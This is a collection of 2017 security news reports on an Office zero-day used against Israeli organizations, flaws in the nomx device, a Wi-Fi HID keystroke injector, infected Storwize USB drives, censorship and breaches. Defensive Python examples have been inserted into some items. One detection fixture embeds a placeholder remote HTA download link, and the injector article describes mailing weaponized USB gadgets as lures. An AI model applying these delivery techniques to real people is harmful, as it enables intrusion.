Iranian Hackers Exploit Recent Office 0-Day in Attacks: Report
1.5.2017 securityweek BigBrothers
A recently patched vulnerability in Microsoft Office has been abused by Iranian threat actors in attacks against Israeli organizations, researchers from security firm Morphisec reveal.
Carried out between April 19 and April 24, 2017, the politically motivated, targeted campaign leveraged the CVE-2017-0199 vulnerability in Office, which Microsoft patched earlier this month after it had already been abused in live attacks. Because many organizations failed to apply the patch, however, the vulnerability continues to offer a viable attack surface.
The attacks targeting Israeli organizations, Morphisec explains, were delivered through compromised email accounts at Ben-Gurion University, which is home to Israel’s Cyber Security Research Center. The actors behind the attack used an existing proof-of-concept (published after the patch was released) to deliver a fileless variant of the Helminth Trojan agent.
The security researchers identified Israeli high-tech development companies, medical organizations and education organizations as victims of the attacks. They also attribute the assaults to an Iranian hacker group known to be responsible for the OilRig malware campaigns.
According to Morphisec, the analyzed Helminth fileless agent was found to be a near perfect match to the OilRig campaign that hit 140 financial institutions in the Middle East last year (at the beginning of 2017, the same actor was revealed to have used a fake Juniper Networks VPN portal and fake University of Oxford websites to deliver malware to several Israeli organizations).
The security researchers also reveal that the threat actors decided to switch from malicious macros in Excel and Word documents to a vulnerability exploit. It’s also worth noting that the group set up the attack fast, mainly because there was only a small window of opportunity between the patch release and rollout.
The abused vulnerability allows attackers to deliver malicious HTA (HTML Application) files through Object Linking and Embedding (OLE) links placed in decoy RTF (Rich Text Format) documents. Once the victim opens the malicious RTF, the HTA file is downloaded, and it in turn loads and executes the final payload.
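As an added defensive illustration (not code from Morphisec or from the article), the following Python scanner applies the heuristic a detection engineer would use against the RTF delivery pattern described above: it flags an auto-updating linked OLE object (the standard RTF control words \objautlink and \objupdate) and decodes the hex \objdata payload to recover any URL, including one stored as UTF-16LE the way an OLE URL moniker does. The sample documents are constructed fixtures with a placeholder URL, not real exploit files.

```python
import re

# Added example: heuristic scanner for the RTF-with-remote-OLE-link delivery
# pattern behind CVE-2017-0199. It is not any vendor's detection logic.
# The RTF control words used below (\object, \objautlink, \objupdate, \objemb,
# \objdata) are standard RTF; everything else is a constructed fixture.

OBJDATA_RE = re.compile(r"\\objdata\s*([0-9A-Fa-f\s]+)")
URL_RE = re.compile(rb"(?:https?|ftp)://[\x21-\x7e]+", re.IGNORECASE)


def decode_objdata(rtf: str):
    """Yield the binary blob hex-encoded inside each \\objdata group."""
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(r"\s+", "", m.group(1))
        try:
            yield bytes.fromhex(hexstr[: len(hexstr) & ~1])
        except ValueError:
            continue


def extract_urls(blob: bytes):
    """Return URLs found in an OLE blob, whether stored as ASCII or UTF-16LE."""
    found = set(URL_RE.findall(blob))
    # A URL moniker stores its target as UTF-16LE; dropping the interleaved
    # NUL bytes turns it back into plain ASCII so the same regex can see it.
    found |= set(URL_RE.findall(blob.replace(b"\x00", b"")))
    return sorted(u.decode("ascii") for u in found)


def scan_rtf(rtf: str) -> dict:
    """Classify one RTF document by its OLE-link indicators."""
    autolink = "\\objautlink" in rtf      # linked (not embedded) object
    autoupdate = "\\objupdate" in rtf     # refresh the link when the doc opens
    urls = []
    for blob in decode_objdata(rtf):
        urls.extend(extract_urls(blob))
    hta_link = any(u.lower().split("?", 1)[0].endswith(".hta") for u in urls)
    if autolink and autoupdate and urls:
        verdict = "high"      # auto-refreshed link to a remote resource
    elif (autolink and autoupdate) or hta_link or (autolink and urls):
        verdict = "medium"
    else:
        verdict = "low"
    return {"objautlink": autolink, "objupdate": autoupdate,
            "urls": urls, "hta_link": hta_link, "verdict": verdict}


def _rtf_with_objdata(control_words: str, payload: bytes) -> str:
    """Build a minimal RTF wrapper around one hex-encoded \\objdata blob."""
    return "{\\rtf1{\\object" + control_words + "{\\*\\objdata " + payload.hex() + "}}}"


# Constructed fixtures (placeholder URL, not real OLE structures).
SAMPLE_LINK_RTF = _rtf_with_objdata(
    "\\objautlink\\objupdate",
    b"\x01\x05\x00\x00" + "http://example.invalid/update.hta".encode("utf-16-le") + b"\x00\x00",
)
SAMPLE_EMBED_RTF = _rtf_with_objdata("\\objemb", b"\xd0\xcf\x11\xe0embedded-object-bytes")
SAMPLE_PLAIN_RTF = "{\\rtf1 Quarterly report, nothing embedded.}"

if __name__ == "__main__":
    for name, doc in [("link", SAMPLE_LINK_RTF), ("embed", SAMPLE_EMBED_RTF), ("plain", SAMPLE_PLAIN_RTF)]:
        print(name, scan_rtf(doc))
```

The hex-decode step matters because a plain string search on the RTF text would never see the URL, which is why the "objautlink + objupdate + remote URL" combination is the signal worth alerting on rather than the presence of an OLE object alone.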
Microsoft addressed the issue in its April 11 set of security patches, but not before cybercriminals started abusing it in new attacks. Some of the most prominent threats observed leveraging the exploit included Dridex, along with Latentbot and WingBird.
“Every few years, a new ‘logic bug’ CVE in OLE object linking is identified; the previous one was three years ago (CVE-2014-0640). This kind of vulnerability is rare but powerful. It allows attackers to embed OLE objects (or links in the case of CVE-2017-0199) and bypass Microsoft validation of OLE execution without warning. In essence, it is the same as playing animation in PowerPoint,” the security researchers conclude.
Email Security Device "nomx" Has Serious Flaws: Researchers
1.5.2017 securityweek Vulnerebility
Researchers claim to have found some serious vulnerabilities in “nomx,” a product designed for securing email communications. The vendor has disputed the findings and assured customers that its devices cannot be hacked remotely.
Nomx is a protocol and device that allegedly “ensures absolute privacy for personal and commercial email and messaging.”
British researchers Scott Helme and Professor Alan Woodward have been asked by the BBC to analyze the nomx personal email server appliance, which costs between $199 and $399, depending on its storage capacity. Their analysis revealed the existence of several security issues, including flaws that can be exploited remotely to hijack a device.
An inspection of nomx hardware components showed that the device was actually powered by a Raspberry Pi, which made it easier for the experts to gain root access and analyze the software running on it.
Nomx not as secure as vendor claims
In a post published on his personal blog, Helme said he found several pieces of outdated software running on the email security device, including Raspbian and PHP from 2015, OpenSSL and MySQL versions from 2016, a Postfix variant from 2013, and nginx and Dovecot from 2012.
According to Helme, the software running on the device does not do much in terms of securing email communications, and the expert said many major email service providers may actually block messages sent via nomx as they share some characteristics with spam.
An analysis of the nomx web interface revealed the existence of several cross-site scripting (XSS) and cross-site request forgery (CSRF) vulnerabilities. Helme said the CSRF flaws can be exploited to create new administrator accounts (i.e. backdoors) and make configuration changes by getting a user to visit a specially crafted webpage.
The researcher said he also discovered a documented default account that provides administrator access to the device. The main problem is that the documentation does not encourage users to change this account’s password and there is no mechanism in place to force a password change after the first login.
Helme also reported that the device he had analyzed had no update mechanism that would allow users to patch the vulnerable software running on the appliance.
Nomx disputes findings and says researchers made false claims
In a statement posted on its website, Nomx disputed the findings and accused the researchers of making false claims. The company said the attack methods detailed by Helme on his blog could not be carried out in a real world scenario.
Nomx pointed out that Helme’s attack involved physical access to the device. However, the researcher said he conducted hardware hacking in order to find out more about how the device works, but this phase of his research is not related to the attacks that can be launched remotely.
Nomx said only earlier versions of its product were based on a Raspberry Pi and claimed the analyzed devices were actually demo units. The firm also provided recommendations on how users can protect themselves against potential CSRF attacks.
“No nomx devices, accounts or data was ever compromised and the blogger could not show any evidence of such actions,” the company stated.
The vendor claims to have challenged Helme and others to hack its device in a real world scenario, but they allegedly failed to complete the task. On the other hand, the researcher denies taking part in this test.
Both the experts and the BBC said they stand by their reports and claimed that the devices they received for testing were described as production units, not early demo units.
NATO Locked Shields 2017, world’s largest cyber defence exercise just ended
1.5.2017 securityaffairs BigBrothers
Locked Shields is the world’s largest and most advanced international technical live-fire cyber defence exercise organized by the NATO since 2010.
Locked Shields is the world’s largest and most sophisticated international cyber defence exercise. Held annually since 2010, it is organized by the NATO Cooperative Cyber Defence Centre of Excellence and aims to train the security experts who protect national IT infrastructure.
Locked Shields 2017 is organised in cooperation with the Estonian Defence Forces, the Finnish Defence Forces, the Swedish Defence University, the British Joint Army, the United States European Command, Air Operations COE and Tallinn University of Technology.
This year’s edition, which concluded recently (24–28 April 2017), involved around 800 participants from 25 nations.
While the organisers of the Locked Shields 2017 exercise were in Tallinn, Estonia, the participating Blue Teams worked remotely through secure connections from their home bases.
The exercise puts participants under pressure, asking them to face different trials, including organizing an incident response, solving forensic challenges, and responding to legal and strategic communications and scenario injects.
Locked Shields is a strategic event that confronts participants with cutting-edge technologies and hacking techniques; this is the only way to prepare for ever more complex cyber threats in a real-world cyber scenario.
“To stay abreast of market developments, Locked Shields focuses on realistic and cutting-edge technologies, networks and attack methods.” reads the official announcement.
In the exercise, which has just ended, the Blue Teams were tasked with maintaining the services and networks of a military air base of a fictional country.
In the simulation, the air base was experiencing a wide range of cyber attacks on its electric power grid system, unmanned aerial vehicles, military command and control systems, critical information infrastructure components and other operational infrastructure.
“The size and scope of technologies, networks and devices used in Locked Shields 2017 has increased considerably – leading to more attacks and specialised systems involved.” continues the announcement. “Specialised systems enable teams to practice the defence of systems that they are not working with on a regular basis. However, in the modern threat landscape incidents with specialised systems may potentially have a profound effect on a military mission or the entire society.”
The experts launched more than 2500 possible attacks against the Blue Teams; according to the NATO IT staff, more than 3000 virtualised systems were deployed during the exercise.
For the first time in the history of the event, this year NATO added a strategic track to the exercise.
The exercise also involved industry partners such as Siemens AG, Threod Systems, Cyber Test Systems, Clarified Security, Iptron, Bytelife, BHC Laboratory, openvpn.net, GuardTime and numerous others.
The Italian team was composed of a group of experts from the three armed forces and the Carabinieri, along with researchers from CINECA (Interuniversity Consortium for the Management of Electronic Calculation Center) and the Universities of Rome La Sapienza and Genoa.
The Ministry of the Interior also took part in the exercise with a group of analysts from the National Anti-Crime Center for Critical Infrastructure Protection (CNAIPIC).
Graph theory applied to a portion of the Dark Web shows it a set of largely isolated dark silos
1.5.2017 securityaffairs Security
A group of researchers conducted a study of the Dark Web leveraging graph theory. This hidden space appears to be composed of sparse and isolated silos.
A group of experts from the Massachusetts Institute of Technology’s SMART lab in Singapore has recently published an interesting research paper on the Dark Web.
The researchers collected and analyzed the dark web (a.k.a. the “onionweb”) hyperlink graph and found it to be highly dissimilar to the well-studied world wide web hyperlink graph.
The team, led by Carlo Ratti, director of MIT’s Senseable City Lab, applied graph theory, a tool normally used for analyzing social relationships, to the dark web.
The experts analyzed the Tor network, one of the most popular darknets, using a crawler that leveraged the tor2web proxy onion.link.
It is important to highlight that the team focused its analysis on the Tor network, which represents just a portion of the dark web.
The team crawled onion.link using the commercial service scrapinghub.com, starting from two popular lists of dark web sites, visiting them and then reaching all linked pages through a breadth-first search.
The team included in its analysis only websites that responded, to avoid counting services that no longer exist.
“I.e., if we discover a link to a page on domain v, but domain v could not be reached after >10 attempts across November 2016–February 2017, we delete node v and all edges to node v.
In our analysis, before pruning nonresponding domains we found a graph of 13,117 nodes and 39,283 edges. After pruning, we have a graph of 7,178 nodes and 25,104 edges (55% and 64% respectively),” state the researchers.
The first discrepancy that emerged from the research concerns the number of active .onion domains. The maintainers at the Tor Project Inc. state that the Tor network currently hosts ∼60,000 distinct, active .onion addresses, while the team found only 7,178 active .onion domains.
The researchers attribute this large discrepancy to various messaging services, particularly TorChat, Tor Messenger and Ricochet, in which each user is identified by a unique .onion domain.
The graph-theoretic results show that ∼30% of domains have exactly one incoming link, and 62% of those links come from one of the five largest out-degree hubs; 78% of all nodes received a connection from at least one of these hubs.
The most intriguing finding is that 87% of sites do not link to any other site, which has a significant impact on all graph-theoretic measures (see the darkweb out-degree distribution in the following image).
“We conclude that in the term “darkweb”, the word “web” is a connectivity misnomer. Instead, it is more accurate to view the darkweb as a set of largely isolated dark silos,” reads the paper. “In our darkweb graph, each vertex is a domain and every directed edge from u → v means there exists a page within domain u linking to a page within domain v. The weight of the edge from u → v is the number of pages on domain u linking to pages on domain v.”
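The crawl-prune-measure pipeline and the graph definition quoted above, as an added Python example that is not part of the paper or of the article: it builds the weighted domain graph (edge weight = distinct pages on u linking into v), drops domains that never responded together with their edges, and then computes the silo share, the one-in-link share and the hub-reach figures the article reports. CRAWL_LINKS and RESPONDING are constructed fixtures and the .onion names are placeholders.

```python
from collections import Counter, defaultdict

# Added example of the crawl-prune-measure pipeline described in the article.
# CRAWL_LINKS is a constructed set of (source_page, target_page) hyperlinks
# and RESPONDING the constructed set of domains that answered the crawler;
# the .onion names are placeholders, not real hidden services.
CRAWL_LINKS = [
    ("hubA.onion/index", "shop1.onion/"),
    ("hubA.onion/index", "forum.onion/"),
    ("hubA.onion/links", "shop1.onion/buy"),
    ("hubA.onion/links", "dead1.onion/"),      # dead1 never responded
    ("hubA.onion/links", "wiki.onion/"),
    ("hubB.onion/", "forum.onion/t1"),
    ("hubB.onion/", "mail.onion/"),
    ("hubB.onion/", "dead2.onion/"),           # dead2 never responded
    ("forum.onion/t1", "wiki.onion/page"),
    ("wiki.onion/page", "hubA.onion/index"),
]
RESPONDING = {"hubA.onion", "hubB.onion", "shop1.onion", "forum.onion",
              "wiki.onion", "mail.onion", "silo1.onion", "silo2.onion"}


def domain(page: str) -> str:
    return page.split("/", 1)[0]


def build_graph(links, responding):
    """Domain graph as in the paper: vertex = domain, edge u -> v weighted by the
    number of distinct pages on u linking into v. Domains that never responded
    are dropped together with every edge touching them (the paper's pruning)."""
    edge_pages = defaultdict(set)
    seen = set(responding)
    for src, dst in links:
        u, v = domain(src), domain(dst)
        seen |= {u, v}
        if u != v:
            edge_pages[(u, v)].add(src)
    before = (len(seen), len(edge_pages))          # (nodes, edges) before pruning
    weight = {(u, v): len(pages) for (u, v), pages in edge_pages.items()
              if u in responding and v in responding}
    return set(responding), weight, before


def degree_stats(nodes, weight, hubs=5):
    """The measures quoted in the article: share of silos (out-degree 0), share of
    domains with exactly one in-link, how many of those come from the top hubs,
    and how many domains any top hub reaches."""
    out_deg, in_deg = Counter(), Counter()
    for u, v in weight:
        out_deg[u] += 1
        in_deg[v] += 1
    n = len(nodes)
    top_hubs = {u for u, _ in out_deg.most_common(hubs)}
    one_in = [v for v in nodes if in_deg[v] == 1]
    one_in_from_hub = [v for v in one_in
                       if any(u in top_hubs for (u, t) in weight if t == v)]
    reached_by_hub = {v for (u, v) in weight if u in top_hubs}
    return {
        "nodes": n,
        "edges": len(weight),
        "no_outlinks_pct": 100.0 * sum(1 for v in nodes if out_deg[v] == 0) / n,
        "one_inlink_pct": 100.0 * len(one_in) / n,
        "one_inlink_from_hub_pct": 100.0 * len(one_in_from_hub) / max(len(one_in), 1),
        "reached_by_hub_pct": 100.0 * len(reached_by_hub) / n,
    }


if __name__ == "__main__":
    nodes, weight, before = build_graph(CRAWL_LINKS, RESPONDING)
    print("before pruning:", before, "after:", (len(nodes), len(weight)))
    print(degree_stats(nodes, weight, hubs=2))
```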
I believe this research could be a starting point for further works, Ratti and his team, along with other researchers could conduct further investigations on the Dark Web, not limiting their analysis to the Tor Network.
Ratti announced that his team is working on the definition of new models to use in further research.
“As next step,” Ratti said, “we are planning to develop a model to explain how a network develops when nodes do not trust each other.”
WHID Injector: How to Bring HID Attacks to the Next Level
1.5.2017 securityaffairs Hacking
Luca Bongiorni was working on a cheap and dedicated hardware that he could remotely control (i.e. over WiFi or BLE), that is how WHID was born.
Since the first public appearance of HID attacks (e.g. PHUKD, Kautilya, Rubberducky), many awesome research projects and results have been published (e.g. Iron HID, Mousejack and the coolest of all, USaBUSe).
Due to this increased amount of nifty software, as a Pentester and Red-Teamer I wanted a cheap and dedicated piece of hardware that I could remotely control (i.e. over WiFi or BLE). And this is how WHID was born.
Since the inception of my first HID injecting devices (based on Teensy boards, see photo below), I always faced the need to decide when to deliver a certain payload. This was partially achieved by using Irongeek’s photoresistor and dip-switch tricks [1].
However, I soon realized that full remote control over a radio channel would be cool. At the beginning, years ago, I was thinking of using some cheap 433 MHz TRX modules connected to the Teensy board… sadly, due to lack of time and other cool projects… this idea was dropped into my awesome pen-testing-tools to-do list. 😋
What is WHID Injector?
At this point, you are wondering what is behind WHID Injector and what its capabilities are. 😎
WHID stands for WiFi HID injector. It is a cheap but reliable piece of hardware designed to fulfill Red-Teamers & Pentesters needs related to HID Attacks, during their engagements.
The core of the WiFi HID injector is mainly an Atmega 32u4 (commonly used in many Arduino boards) and an ESP-12s (which provides the WiFi capabilities and is commonly used in IoT projects).
WHID’s Software
When I started to think about a remotely controlled HID injector, and thus about adding an ESP chipset to an Arduino-like board, I soon found out that some hardware already existed that could fulfill my need: AprBrother’s Cactus Micro Rev2 (which was, sadly, at EOL).
Nonetheless, I started to read the ESP specs and think about how to create a simple PoC sketch that would let me remotely upload malicious payloads through the WiFi AP. And here it is [2] (I would like to thank Corey from http://www.LegacySecurityGroup.com for his initial experiments).
Afterwards, with working software in my hands, I wanted to improve the EOL Cactus Micro Rev2 hardware (considering that it is also compatible with USaBUSe [3]).
Overall, this is how my simple GUI looks (I know it looks awful, but it works! 😁):
Third-Party Software Supported
USaBUSe – Github Repo
This awesome tool has been created by @RoganDawes from @SensePost.
It is more than a simple remote HID injector! It makes it possible to bypass air-gapped environments and to have a side-channel C&C communication over WHID’s ESP WiFi!
Further links:
Defcon 24 Video
Defcon 24 Slides
https://sensepost.com/blog/2016/universal-serial-abuse/
USaBUSe Video PoC
Cyberkryption’s Tutorial
WiFi Ducky – Github Repo
This is a nice project developed by @spacehuhn, and it takes my simplistic WHID software even further by adding cool features like real-time injection, ESP firmware OTA update, etc.
WiDucky – Github Repo
An older-but-cool project, which has the advantage of using the ESP’s WiFi as a C&C communication channel. It also has its own Android app for remote control.
Some Video Tutorials
I will leave here a couple of videos about WHID Injector’s installation and capabilities.
WHID Attack Simulation against Windows 10 Enterprise
Wifi Ducky on WHID device (WINDOWS)
How To Install WHID Injector Software on WINDOWS
How To Install WHID Injector Software on OSX
Possible Applications
Classic – Remote Keystrokes Injection Over WiFi
Deploy WHID on the victim’s machine and remotely control it by accessing its WiFi AP SSID (alternatively, you can also set up WHID to connect to an existing WiFi network).
Social Engineering – Deploy WHID inside a USB-enabled gadget
The main idea behind this is to test for social engineering weaknesses within your target organization (e.g. DLP policy violations) and to bypass physical access restrictions to the victim’s PC.
Usually, I create a fancy brochure (sample template https://github.com/whid-injector/WHID/tree/master/tools/Social_Engineering_Lures ) attached with a weaponized USB gadget and then use a common delivery carrier (e.g. UPS, DHL, FedEx).
Conclusion
As you may have noticed from the third-party software above, WHID has a lot of potential: not only can it play the usual role of HID injector, but it can also bypass air-gapped environments.
If you would like to play with it… AprBrother opened the pre-orders here
https://blog.aprbrother.com/product/cactus-whid
So far, beta testers have already provided very valuable feedback to improve the final version of WHID. I’d like to thank @RoganDawes for suggesting adding the Hall sensor as a reset switch!
[1] http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
[2] https://github.com/whid-injector/WHID/tree/master/sketches/cactus_micro_rev2
[3] https://github.com/sensepost/USaBUSe
Lenovo warns of IBM Storwize shipped with infected initialization USB drives
30.4.2017 securityaffairs Virus
Some USB flash drives containing the initialization tool shipped with the IBM Storwize for Lenovo contain a malicious file.
Some USB flash drives containing the initialization tool shipped with the IBM Storwize for Lenovo V3500, V3700 and V5000 Gen 1 storage systems contain a file that has been infected with malicious code.
The Initialization Tool on the USB flash drive with part number 01AC585, which shipped with the following system models, may contain the malicious file:
IBM Storwize for Lenovo V3500 – 6096 models 02A and 10A
IBM Storwize for Lenovo V3700 – 6099 models 12C, 24C and 2DC
IBM Storwize for Lenovo V5000 – 6194 models 12C and 24C
IBM Storwize for Lenovo Systems with serial numbers starting with the characters 78D2 are not impacted.
The news was reported by Lenovo. The IBM Storwize systems are virtualizing RAID data storage systems manufactured by IBM.
According to Lenovo, the malicious file does not affect the integrity or performance of the storage systems.
Experts from Lenovo reported that when the initialization tool is launched from the USB flash drive on a computer used for the initial configuration, it copies itself, along with the malicious file, to a temporary folder on the hard drive of the desktop or laptop.
The Initialization USB flash drive contains a folder called InitTool, the tool and the malware are copied to the following temporary folder:
On Windows systems: %TMP%\initTool
On Linux and Mac systems: /tmp/initTool
It is important to highlight that the malicious file isn’t executed in this phase.
“Important: While the malicious file is copied onto the computer, the file is not executed during initialization and is not run unless a user manually executes it. The infected file does not affect the IBM Storwize for Lenovo system.” states a security advisory published by Lenovo. “The initialization tool is only used to write a text file on the USB key, which is then read by Storwize, which will then write a separate text file onto the key. At no point during the time that the USB thumb drive is inserted in the Storwize system is any information copied from the thumb drive directly to the Storwize system, nor is any code executed on the Storwize system.”
IBM and Lenovo have adopted the necessary measures to prevent any further problem in the supply chain and have stopped the shipment of additional USB flash drives.
Lenovo advises customers not to use the affected flash drives and to contact the company instead for support with the first configuration of the Storwize systems.
Customers that have already used the initialization USB flash drive from one of the affected products need to verify whether their antivirus software has already detected and removed the malicious file.
To manually remove the malicious file, customers can delete the temporary directory:
On Windows systems: %TMP%\initTool
On Linux and Mac systems: /tmp/initTool
“In addition, for Windows systems, ensure the entire directory is deleted (not moved to the Recycle Bin folder). This can be accomplished by selecting the directory and Shift->Right-click->Delete the directory.” suggests Lenovo.
Let me close by sharing with you the MD5 hash of the malicious file.
0178a69c43d4c57d401bf9596299ea57
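The check and cleanup above, as an added Python script that is not Lenovo's tooling: it hashes every file under the initTool folder against the MD5 from the advisory and deletes the whole folder rather than moving it to the Recycle Bin. The folder paths and the hash are the advisory's; make_sample_dir is a helper assumed here only to build a throwaway test folder.

```python
import hashlib
import os
import shutil
import sys
import tempfile

# Added example (not Lenovo's tooling): check the initialization tool's
# temporary folder for the malicious file and remove the folder outright.
# The folder paths and the MD5 come from the Lenovo advisory quoted above.
ADVISORY_MD5 = {"0178a69c43d4c57d401bf9596299ea57"}


def inittool_dir() -> str:
    """%TMP%\\initTool on Windows, /tmp/initTool on Linux and Mac."""
    if sys.platform.startswith("win"):
        return os.path.join(os.environ.get("TMP", tempfile.gettempdir()), "initTool")
    return "/tmp/initTool"


def md5_of(path: str, chunk: int = 1 << 20) -> str:
    """Hash a file in chunks so large tool binaries are not loaded whole."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def find_infected(directory: str, known_bad=ADVISORY_MD5):
    """Return the paths under `directory` whose MD5 matches a known-bad hash."""
    hits = []
    if not os.path.isdir(directory):
        return hits
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            try:
                if md5_of(path) in known_bad:
                    hits.append(path)
            except OSError:
                continue          # unreadable file: skip it, keep scanning
    return hits


def remove_inittool_dir(directory: str) -> bool:
    """Delete the whole folder (no Recycle Bin, as the advisory requires)."""
    if not os.path.isdir(directory):
        return False
    shutil.rmtree(directory)
    return True


def make_sample_dir(contents: dict) -> str:
    """Build a throwaway folder with the given {name: bytes} files (test fixture)."""
    d = tempfile.mkdtemp(prefix="initTool-sample-")
    for name, data in contents.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    return d


if __name__ == "__main__":
    target = inittool_dir()
    hits = find_infected(target)
    print(f"{target}: {'present' if os.path.isdir(target) else 'absent'}, "
          f"{len(hits)} file(s) matching the advisory hash")
    if "--remove" in sys.argv and remove_inittool_dir(target):
        print("removed", target)
```

Running it without --remove only reports; the advisory's instruction is to delete the whole folder whether or not the hash matches, since the tool copies itself there along with the malicious file.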
Turkey banned Wikipedia because its web content represents a threat to national security
30.4.2017 securityaffairs BigBrothers
The monitoring group Turkey Blocks confirmed that Turkey banned Wikipedia because its web content represents a threat to national security.
According to the telecommunications watchdog, Turkey blocked access to the online encyclopedia Wikipedia on Saturday; the Government took this decision citing a law that allows it to ban access to web content that represents a threat to national security.
Under the law, the watchdog has to submit the ban to a court within 24 hours, then the court has two days to decide whether the ban should be confirmed.
“After technical analysis and legal consideration … an administrative measure has been taken for this website (Wikipedia.Org),” the BTK telecommunications watchdog said in a statement on its website.
Monitoring group Turkey Blocks first observed the block of Wikipedia at 8:00 a.m. (1.00 a.m. ET) on Saturday.
“The loss of availability is consistent with internet filters used to censor content in the country,” reported Turkey Blocks.
Turkey Blocks (@TurkeyBlocks), 7:22 AM - 29 Apr 2017: “Confirmed: All editions of the #Wikipedia online encyclopedia blocked in #Turkey as of 8:00AM local time” https://turkeyblocks.org/2017/04/29/wikipedia-blocked-turkey/
The Turkish communications Ministry announced that Wikipedia has been banned due to its attempts to run a “smear campaign” against Turkey. Some pages in the encyclopedia purported that the Turkish Government was coordinating with militant groups.
“Instead of coordinating against terrorism, it has become part of an information source which is running a smear campaign against Turkey in the international arena,” reported the Anadolu Agency.
Turkey is asking Wikipedia to remove the content it objects to; only then will the ban be lifted.
Turkey has adopted similar measures in the past, when the Government blocked major social media platforms such as Twitter and Facebook. The Turkish Government has always denied censorship activities and blamed outages on spikes in usage after major events.
Security experts confirmed that the blackouts on social media are the result of the operations of the government to stop the spread of militant images and propaganda.
“President Tayyip Erdogan says the measures are needed given the scope of the security threat Turkey faces.” reported the Reuters agency.
“Turkey last year jailed 81 journalists, making it the world’s top jailor of journalists, according to the New York-based Committee to Protect Journalists.”
Hacker holds Netflix to ransom over new episodes of Orange Is The New Black
30.4.2017 securityaffairs Ransomware
The hacker ‘The Dark Overlord’ claims to have stolen and leaked online episodes from the forthcoming season of the TV show Orange Is The New Black.
A hacker who goes online with the moniker “The Dark Overlord” claims to have stolen episodes from the forthcoming season of the TV show ‘Orange is the New Black.’
The Dark Overlord demanded an unspecified sum from Netflix, but the company refused to pay the ransom, so the hacker released the episodes online, sharing a link to a downloadable torrent on The Pirate Bay.
The Dark Overlord also claims to have stolen TV shows from other broadcasters, including ABC, Fox, and National Geographic.
Below is the hacker’s message:
“We’re back again. Did you miss us? Of course, you did. We’re willing to bet Netflix did as well. Speaking of which, Netflix clearly received our message considering they’ve made public statements and was one of the first people to download a fresh copy of their own property (Hello, [redacted IP address]!) – yet they continue to remain unresponsive. With this information in mind (and the fact that leaving people on cliffhangers isn’t fun) we’ve decided to release Episodes 2-10 of “Orange Is The New Black” Season 5 after many lengthy discussions at the office where alcohol was present. Do note that there are 13 episodes. However, we were so early when we acquired the copies that post hadn’t gotten around to Episodes 11-13. Perhaps Netflix will consider releasing the season earlier now that the cat’s out of the bag?
We’re not quite done yet, though. We’re calling you out: ABC, National Geographic, Fox, IFC, and of course Netflix, still. There’s more Netflix on the feasting menu soon (in addition to the other studios, of course), but we’ll get to that later. Enjoy the fruits of _our_ labour.”
Experts speculate that the hacker obtained the material by hacking one of the companies assisting with the production or promotion of the TV series.
The news was confirmed by Netflix that declared that “a production vendor used by several major TV studios had its security compromised and the appropriate law enforcement authorities are involved.”
“Earlier, it said that a small production vendor that works with several major TV studios had suffered a breach. The company, based in Los Gatos, California, described the breach as an “active situation” that was being investigated by the FBI and other authorities.” states The Guardian.
In November, The Dark Overlord hacked the glue and adhesive company Gorilla Glue and stole 500 GB worth of corporate data.
US NSA Spy Agency Halts Controversial Email Sweep
30.4.2017 securityweek BigBrothers
The National Security Agency announced Friday it would end its controversial practice of sweeping up any email or text message an American exchanges with someone overseas that makes reference to a real target of NSA surveillance.
The powerful US spy agency said that although it has the legal power to continue scooping up such communications, it would halt the practice to protect the privacy of US citizens.
"NSA will no longer collect certain internet communications that merely mention a foreign intelligence target," it said in a statement.
The NSA, the country's premier signals intelligence body, is permitted to collect communications of any foreign target, but not that of Americans except in certain situations, or if it gains a warrant to do so.
Under Section 702 of the Foreign Intelligence Surveillance Act, it is allowed to scoop up a US citizen's emails or texts with someone outside the country if those merely mention a specific NSA surveillance target -- so-called "about" collection.
The practice has sparked heavy criticism from civil liberties advocates, who say it violates constitutional protections. Many have threatened to try to block the renewal of Section 702 at the end of this year if the law is not tightened. But the country's intelligence community wants the law to be renewed unchanged.
The NSA said it would voluntarily end "about" collection even if it means that it might lose access to other important information in the fight against cyber threats and terrorism.
Senator Ron Wyden, a Democrat on the Senate Intelligence Committee, praised the move but said that Section 702 needs multiple changes.
"To permanently protect Americans' rights, I intend to introduce legislation banning this kind of collection in the future," he said.
Turkey Blocks Access to Wikipedia Over 'Terror' Claims
30.4.2017 securityweek IT
Turkey on Saturday blocked all access inside the country to the online encyclopedia Wikipedia reportedly for articles claiming links between Ankara and terror groups, the latest restriction on a popular website to hit Turkish users.
Turkey's Information and Communication Technologies Authority (BTK) said it had implemented the ban against Wikipedia.org, without making clear the reason for the move. Turkish state media said the ban was imposed because Wikipedia had failed to remove content promoting terror and accusing Turkey of cooperation with various terror groups.
There was no indication as to when the ban might be removed, with a formal court order expected to follow in the coming days.
Reacting to the ban, Wikipedia's founder Jimmy Wales wrote on Twitter: "Access to information is a fundamental human right. Turkish people, I will always stand with you to fight for this right."
A block affecting all language editions of the website in Turkey was detected from 0500 GMT after an administrative order by the Turkish authorities, according to the Turkey Blocks monitoring group, which follows internet restrictions in the country.
Residents in Istanbul were unable to access any pages of Wikipedia on Saturday morning without using a Virtual Private Network (VPN), AFP correspondents said.
"The loss of availability is consistent with internet filters used to censor content in the country," Turkey Blocks said.
'Law No. 5651'
The BTK confirmed the ban in a statement but gave no details.
"After technical analysis and legal consideration based on the Law No. 5651, an administrative measure has been taken for this website Wikipedia.org," it said.
Law 5651, passed in 2014 by parliament, bolstered the BTK's control over the internet and was seen at the time by freedom of expression activists as an erosion of online liberties.
The incident quickly spawned its own separate Wikipedia entry -- "Wikipedia blocked in Turkey".
Quoting Turkey's transport and communications ministry, the state-run Anadolu news agency said the ban was imposed because Wikipedia had failed to take down content purporting to show Turkey "on the same level as and cooperating with" terror groups.
It said Turkey had kept in contact with Wikipedia but the site had failed to remove the content in question.
Should the content be removed, the order would be lifted and access restored, it said.
No further details were given but Turkey has long taken a hard line against what it calls "terror propaganda" in favour of the outlawed Kurdistan Workers' Party (PKK).
Critics of Turkey, including Kurdish militants, have accused Ankara of occasionally collaborating with jihadists in Syria, a claim fiercely rejected by the government.
'Temporary security measures'
Turkey has become notorious in recent years for temporarily blocking access to popular sites, including Facebook and Twitter, in the wake of major events such as mass protests or terror attacks.
